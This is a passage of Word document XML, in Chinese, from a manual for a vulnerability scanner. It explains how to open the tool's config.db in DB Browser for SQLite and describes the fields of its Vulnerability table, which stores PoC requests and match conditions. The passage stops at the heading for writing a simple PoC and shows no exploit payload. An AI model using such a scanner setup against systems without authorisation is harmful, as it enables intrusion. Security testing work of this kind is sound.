        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3347D965" w14:textId="77777777" w:rsidR="006F6ADA" w:rsidRDefault="006F6ADA" w:rsidP="006E4760">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4FABFC74" w14:textId="77777777" w:rsidR="006F6ADA" w:rsidRDefault="006F6ADA" w:rsidP="006E4760">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2B3C3EA2" w14:textId="77777777" w:rsidR="006F6ADA" w:rsidRDefault="006F6ADA" w:rsidP="006E4760">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7EBF96FA" w14:textId="77777777" w:rsidR="006F6ADA" w:rsidRDefault="006F6ADA" w:rsidP="006E4760">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1B0704CA" w14:textId="77777777" w:rsidR="006F6ADA" w:rsidRDefault="006F6ADA" w:rsidP="006E4760">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="10B8003C" w14:textId="77777777" w:rsidR="006F6ADA" w:rsidRDefault="006F6ADA" w:rsidP="006E4760">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6C81B6B0" w14:textId="77777777" w:rsidR="006F6ADA" w:rsidRDefault="006F6ADA" w:rsidP="006E4760">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="186E826C" w14:textId="77777777" w:rsidR="006F6ADA" w:rsidRDefault="006F6ADA" w:rsidP="006E4760">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5277EB01" w14:textId="77777777" w:rsidR="006F6ADA" w:rsidRDefault="006F6ADA" w:rsidP="006E4760">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6D7DDCF4" w14:textId="77777777" w:rsidR="006F6ADA" w:rsidRDefault="006F6ADA" w:rsidP="006E4760">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="09C7B423" w14:textId="77777777" w:rsidR="006F6ADA" w:rsidRDefault="006F6ADA" w:rsidP="006E4760">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6F2B4121" w14:textId="77777777" w:rsidR="006F6ADA" w:rsidRDefault="006F6ADA" w:rsidP="006E4760">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4C489829" w14:textId="77777777" w:rsidR="006F6ADA" w:rsidRDefault="006F6ADA" w:rsidP="006E4760">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7A6D6E91" w14:textId="77777777" w:rsidR="006F6ADA" w:rsidRDefault="006F6ADA" w:rsidP="006E4760">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="70DD716B" w14:textId="77777777" w:rsidR="006F6ADA" w:rsidRDefault="006F6ADA" w:rsidP="006E4760">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="14C9D3B6" w14:textId="77777777" w:rsidR="006F6ADA" w:rsidRDefault="006F6ADA" w:rsidP="006E4760">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2DC1A629" w14:textId="77777777" w:rsidR="006F6ADA" w:rsidRPr="006E4760" w:rsidRDefault="006F6ADA" w:rsidP="006E4760">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="40BBA7D4" w14:textId="64FDAB56" w:rsidR="00DF258B" w:rsidRPr="006F6ADA" w:rsidRDefault="006E4760" w:rsidP="006F6ADA">
      <w:pPr>
        <w:pStyle w:val="1"/>
        <w:rPr>
          <w:rFonts w:ascii="方正小标宋简体" w:eastAsia="方正小标宋简体" w:hAnsi="方正小标宋简体" w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="0" w:name="_Toc171467005"/>
      <w:r w:rsidRPr="006F6ADA">
        <w:rPr>
          <w:rFonts w:ascii="方正小标宋简体" w:eastAsia="方正小标宋简体" w:hAnsi="方正小标宋简体" w:hint="eastAsia"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>一，</w:t>
      </w:r>
      <w:r w:rsidR="00985A8B" w:rsidRPr="006F6ADA">
        <w:rPr>
          <w:rFonts w:ascii="方正小标宋简体" w:eastAsia="方正小标宋简体" w:hAnsi="方正小标宋简体" w:hint="eastAsia"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>POC编写模块介绍</w:t>
      </w:r>
      <w:bookmarkEnd w:id="0"/>
      <w:r w:rsidR="00985A8B" w:rsidRPr="006F6ADA">
        <w:rPr>
          <w:rFonts w:ascii="方正小标宋简体" w:eastAsia="方正小标宋简体" w:hAnsi="方正小标宋简体"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="652AE924" w14:textId="24AA1F18" w:rsidR="00DF258B" w:rsidRPr="006F6ADA" w:rsidRDefault="006E4760" w:rsidP="006F6ADA">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:rPr>
          <w:rFonts w:ascii="方正小标宋简体" w:eastAsia="方正小标宋简体" w:hAnsi="方正小标宋简体" w:hint="eastAsia"/>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="1" w:name="_Toc171467006"/>
      <w:r w:rsidRPr="006F6ADA">
        <w:rPr>
          <w:rFonts w:ascii="方正小标宋简体" w:eastAsia="方正小标宋简体" w:hAnsi="方正小标宋简体" w:hint="eastAsia"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t xml:space="preserve">1.1 </w:t>
      </w:r>
      <w:r w:rsidR="00DF258B" w:rsidRPr="006F6ADA">
        <w:rPr>
          <w:rFonts w:ascii="方正小标宋简体" w:eastAsia="方正小标宋简体" w:hAnsi="方正小标宋简体" w:hint="eastAsia"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>数据库sqlite</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1"/>
    </w:p>
    <w:p w14:paraId="1988C5D9" w14:textId="4A8C44E3" w:rsidR="00DF258B" w:rsidRDefault="00DF258B" w:rsidP="00DF258B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>sqllite数据库使用工具市面上有很多，这里我建议使用</w:t>
      </w:r>
      <w:r w:rsidRPr="00DF258B">
        <w:t>DB Browser for SQLite</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，下载地址：</w:t>
      </w:r>
      <w:hyperlink r:id="rId6" w:history="1">
        <w:r w:rsidRPr="005E4353">
          <w:rPr>
            <w:rStyle w:val="ae"/>
          </w:rPr>
          <w:t>https://sqlitebrowser.org/dl/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="148F7F7D" w14:textId="601A98DA" w:rsidR="00DF258B" w:rsidRDefault="00DF258B" w:rsidP="00DF258B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5C9EDAEA" wp14:editId="158306F5">
            <wp:extent cx="5274310" cy="3535680"/>
            <wp:effectExtent l="0" t="0" r="2540" b="7620"/>
            <wp:docPr id="2059972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9722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87EE" w14:textId="00C519A7" w:rsidR="00DF258B" w:rsidRDefault="00DF258B" w:rsidP="00DF258B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>使用</w:t>
      </w:r>
      <w:r w:rsidRPr="00DF258B">
        <w:t>DB Browser for SQLite</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>打开数据库</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F5726F0" w14:textId="3792495C" w:rsidR="00DF258B" w:rsidRDefault="00DF258B" w:rsidP="00DF258B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="02152844" wp14:editId="4A07127B">
            <wp:extent cx="4888618" cy="2575560"/>
            <wp:effectExtent l="0" t="0" r="7620" b="0"/>
            <wp:docPr id="387060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606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8663" cy="258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7000" w14:textId="77777777" w:rsidR="008C040F" w:rsidRDefault="008C040F" w:rsidP="00DF258B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6EF652E6" w14:textId="3E3E4064" w:rsidR="00DF258B" w:rsidRPr="006F6ADA" w:rsidRDefault="006E4760" w:rsidP="006F6ADA">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:rPr>
          <w:rFonts w:ascii="方正小标宋简体" w:eastAsia="方正小标宋简体" w:hAnsi="方正小标宋简体" w:hint="eastAsia"/>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="2" w:name="_Toc171467007"/>
      <w:r w:rsidRPr="006F6ADA">
        <w:rPr>
          <w:rFonts w:ascii="方正小标宋简体" w:eastAsia="方正小标宋简体" w:hAnsi="方正小标宋简体" w:hint="eastAsia"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t xml:space="preserve">1.2 </w:t>
      </w:r>
      <w:r w:rsidR="00DF258B" w:rsidRPr="006F6ADA">
        <w:rPr>
          <w:rFonts w:ascii="方正小标宋简体" w:eastAsia="方正小标宋简体" w:hAnsi="方正小标宋简体"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>C</w:t>
      </w:r>
      <w:r w:rsidR="00DF258B" w:rsidRPr="006F6ADA">
        <w:rPr>
          <w:rFonts w:ascii="方正小标宋简体" w:eastAsia="方正小标宋简体" w:hAnsi="方正小标宋简体" w:hint="eastAsia"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>onfig.db</w:t>
      </w:r>
      <w:r w:rsidR="006726E2" w:rsidRPr="006F6ADA">
        <w:rPr>
          <w:rFonts w:ascii="方正小标宋简体" w:eastAsia="方正小标宋简体" w:hAnsi="方正小标宋简体" w:hint="eastAsia"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>介绍</w:t>
      </w:r>
      <w:bookmarkEnd w:id="2"/>
    </w:p>
    <w:p w14:paraId="6FBA1FBF" w14:textId="65BB0544" w:rsidR="00DF258B" w:rsidRDefault="00DF258B" w:rsidP="00DF258B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在config.db中，存在三个表</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CE5C544" w14:textId="716E4BFC" w:rsidR="00DF258B" w:rsidRDefault="006726E2" w:rsidP="00DF258B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2F66073F" wp14:editId="26BC5789">
            <wp:extent cx="5274310" cy="1619885"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="8609585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9585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91BE" w14:textId="670857A0" w:rsidR="006726E2" w:rsidRDefault="006726E2" w:rsidP="00DF258B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>F</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ingerprint：此表是存放指纹的地方</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66C85E99" w14:textId="571E9F4C" w:rsidR="006726E2" w:rsidRDefault="006726E2" w:rsidP="00DF258B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>S</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>qlite_sequence：不知道干什么的，突然出现的一个表，删不掉了</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="173D80C2" w14:textId="49CAB64F" w:rsidR="006726E2" w:rsidRDefault="006726E2" w:rsidP="006726E2">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>V</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ulnerability：存放POC的表</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DD1EC0C" w14:textId="4E9BC8A9" w:rsidR="006726E2" w:rsidRPr="006F6ADA" w:rsidRDefault="006E4760" w:rsidP="006F6ADA">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:rPr>
          <w:rFonts w:ascii="方正小标宋简体" w:eastAsia="方正小标宋简体" w:hAnsi="方正小标宋简体" w:hint="eastAsia"/>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="3" w:name="_Toc171467008"/>
      <w:r w:rsidRPr="006F6ADA">
        <w:rPr>
          <w:rFonts w:ascii="方正小标宋简体" w:eastAsia="方正小标宋简体" w:hAnsi="方正小标宋简体" w:hint="eastAsia"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t xml:space="preserve">1.3 </w:t>
      </w:r>
      <w:r w:rsidR="006726E2" w:rsidRPr="006F6ADA">
        <w:rPr>
          <w:rFonts w:ascii="方正小标宋简体" w:eastAsia="方正小标宋简体" w:hAnsi="方正小标宋简体" w:hint="eastAsia"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>Vulnerability 表介绍</w:t>
      </w:r>
      <w:bookmarkEnd w:id="3"/>
    </w:p>
    <w:p w14:paraId="04CE983B" w14:textId="43F94382" w:rsidR="006726E2" w:rsidRDefault="006726E2" w:rsidP="006726E2">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>点击浏览数据</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22D86E06" w14:textId="4845A3B9" w:rsidR="006726E2" w:rsidRDefault="006726E2" w:rsidP="006726E2">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="32A6C135" wp14:editId="3F2AFB28">
            <wp:extent cx="5274310" cy="2837180"/>
            <wp:effectExtent l="0" t="0" r="2540" b="1270"/>
            <wp:docPr id="215478434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78434" name="图片 1" descr="图形用户界面, 文本, 应用程序, 电子邮件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00FD" w14:textId="57325F17" w:rsidR="006726E2" w:rsidRDefault="006726E2" w:rsidP="006726E2">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>点击选中vulnerability表选中即可。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15082CEC" w14:textId="254ACCB5" w:rsidR="006726E2" w:rsidRDefault="006726E2" w:rsidP="006726E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0B4EF0E" wp14:editId="69DED97F">
            <wp:extent cx="5274310" cy="3088640"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="1515912848" name="图片 1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912848" name="图片 1" descr="图形用户界面, 应用程序, 表格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0CC9" w14:textId="5B77A4A3" w:rsidR="00985A8B" w:rsidRPr="00AE1C5D" w:rsidRDefault="006726E2" w:rsidP="006726E2">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>此表中有10个字段，分别是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985A8B" w14:paraId="09698BBD" w14:textId="77777777" w:rsidTr="00985A8B">
        <w:trPr>
          <w:trHeight w:val="609"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1555" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7C7F3942" w14:textId="174C61DA" w:rsidR="00985A8B" w:rsidRDefault="00985A8B" w:rsidP="006726E2">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00985A8B">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t>V</w:t>
            </w:r>
            <w:r w:rsidRPr="00985A8B">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t>uln</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6741" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="37C48686" w14:textId="67E26249" w:rsidR="00985A8B" w:rsidRDefault="00985A8B" w:rsidP="006726E2">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>漏洞名称</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00985A8B" w14:paraId="625E04C7" w14:textId="77777777" w:rsidTr="00985A8B">
        <w:trPr>
          <w:trHeight w:val="560"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1555" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="312288F5" w14:textId="2998710F" w:rsidR="00985A8B" w:rsidRDefault="00985A8B" w:rsidP="006726E2">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00985A8B">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t>CMS</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6741" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="14ECFACB" w14:textId="7CFA8D09" w:rsidR="00985A8B" w:rsidRDefault="00985A8B" w:rsidP="006726E2">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>中间件名称（建议必须是fingerprint表中存在的）</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00985A8B" w14:paraId="01403EA4" w14:textId="77777777" w:rsidTr="00985A8B">
        <w:trPr>
          <w:trHeight w:val="554"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1555" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4BEA27A0" w14:textId="22EF4C17" w:rsidR="00985A8B" w:rsidRDefault="00985A8B" w:rsidP="006726E2">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00985A8B">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t>L</w:t>
            </w:r>
            <w:r w:rsidRPr="00985A8B">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t>able</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6741" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="70FEFD17" w14:textId="0A845FD0" w:rsidR="00985A8B" w:rsidRDefault="00985A8B" w:rsidP="006726E2">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>漏洞类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00985A8B" w14:paraId="44094484" w14:textId="77777777" w:rsidTr="00985A8B">
        <w:trPr>
          <w:trHeight w:val="704"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1555" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="18AFC09E" w14:textId="1779241D" w:rsidR="00985A8B" w:rsidRDefault="00985A8B" w:rsidP="006726E2">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00985A8B">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t>R</w:t>
            </w:r>
            <w:r w:rsidRPr="00985A8B">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t>equest</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6741" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="297D393B" w14:textId="572A8223" w:rsidR="00985A8B" w:rsidRDefault="00985A8B" w:rsidP="006726E2">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>请求，本工具最多支持3次请求，直接将请求包放入该字段中即可</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00985A8B" w14:paraId="082857B0" w14:textId="77777777" w:rsidTr="00985A8B">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1555" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3296675D" w14:textId="22D518EC" w:rsidR="00985A8B" w:rsidRDefault="00985A8B" w:rsidP="006726E2">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00985A8B">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t>C</w:t>
            </w:r>
            <w:r w:rsidRPr="00985A8B">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t>ondition</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6741" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4F08300E" w14:textId="7B6862C2" w:rsidR="00985A8B" w:rsidRDefault="00985A8B" w:rsidP="006726E2">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>每次请求的判断条件，目前判断条件分别是有四个基本函数</w:t>
            </w:r>
            <w:r w:rsidRPr="00985A8B">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve"> body ，header ,</w:t>
            </w:r>
            <w:r w:rsidRPr="00985A8B">
              <w:t xml:space="preserve"> latency</w:t>
            </w:r>
            <w:r w:rsidRPr="00985A8B">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve"> ,和s</w:t>
            </w:r>
            <w:r w:rsidRPr="00985A8B">
              <w:t>tatus_code</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00985A8B" w14:paraId="42E053D0" w14:textId="77777777" w:rsidTr="00985A8B">
        <w:trPr>
          <w:trHeight w:val="638"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1555" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0EB8C32C" w14:textId="5B4680CD" w:rsidR="00985A8B" w:rsidRDefault="00985A8B" w:rsidP="006726E2">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00985A8B">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t>Disposal1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6741" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6124265B" w14:textId="151E054D" w:rsidR="00985A8B" w:rsidRDefault="00985A8B" w:rsidP="006726E2">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>漏洞备注信息 可写可不写</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="1F272216" w14:textId="77777777" w:rsidR="00985A8B" w:rsidRDefault="00985A8B" w:rsidP="006726E2">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6FEFC6CE" w14:textId="150BBD95" w:rsidR="00985A8B" w:rsidRPr="006F6ADA" w:rsidRDefault="006E4760" w:rsidP="006F6ADA">
      <w:pPr>
        <w:pStyle w:val="1"/>
        <w:rPr>
          <w:rFonts w:ascii="方正小标宋简体" w:eastAsia="方正小标宋简体" w:hAnsi="方正小标宋简体" w:hint="eastAsia"/>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="4" w:name="_Toc171467009"/>
      <w:r w:rsidRPr="006F6ADA">
        <w:rPr>
          <w:rFonts w:ascii="方正小标宋简体" w:eastAsia="方正小标宋简体" w:hAnsi="方正小标宋简体" w:hint="eastAsia"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>二，</w:t>
      </w:r>
      <w:r w:rsidR="00985A8B" w:rsidRPr="006F6ADA">
        <w:rPr>
          <w:rFonts w:ascii="方正小标宋简体" w:eastAsia="方正小标宋简体" w:hAnsi="方正小标宋简体" w:hint="eastAsia"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>POC编写和使用</w:t>
      </w:r>
      <w:bookmarkEnd w:id="4"/>
    </w:p>
    <w:p w14:paraId="61AFED8D" w14:textId="695DF961" w:rsidR="006E4760" w:rsidRPr="006F6ADA" w:rsidRDefault="006E4760" w:rsidP="006F6ADA">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:rPr>
          <w:rFonts w:ascii="方正小标宋简体" w:eastAsia="方正小标宋简体" w:hAnsi="方正小标宋简体" w:hint="eastAsia"/>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="5" w:name="_Toc171467010"/>
      <w:r w:rsidRPr="006F6ADA">
        <w:rPr>
          <w:rFonts w:ascii="方正小标宋简体" w:eastAsia="方正小标宋简体" w:hAnsi="方正小标宋简体" w:hint="eastAsia"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>2.1 简单的POC编写</w:t>
      </w:r>
      <w:bookmarkEnd w:id="5"/>
    </w:p>
